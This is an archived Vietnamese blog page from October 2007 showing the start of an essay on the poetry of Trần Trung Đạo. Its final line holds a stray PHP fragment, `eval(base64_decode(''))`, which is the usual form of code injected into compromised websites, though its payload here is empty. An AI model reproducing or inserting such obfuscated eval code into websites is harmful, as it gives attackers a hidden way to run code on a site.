Archive for October 12th, 2007

Nguyễn Hoàng Lãng Du, Nguyễn Thanh Huy: Thơ Trần Trung Đạo, nỗi thao thức của một người yêu Việt Nam

Trần Trung Đạo không phải là người xa lạ trong giới văn nghệ. Những sáng tác của anh đã đăng trên các báo, xuất bản và được nhiều người đón nhận. Thơ của anh có kích thước vì chuyên chở được cái tình yêu thương của Con Ngư

10.12.2007 | Nhận Xét |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>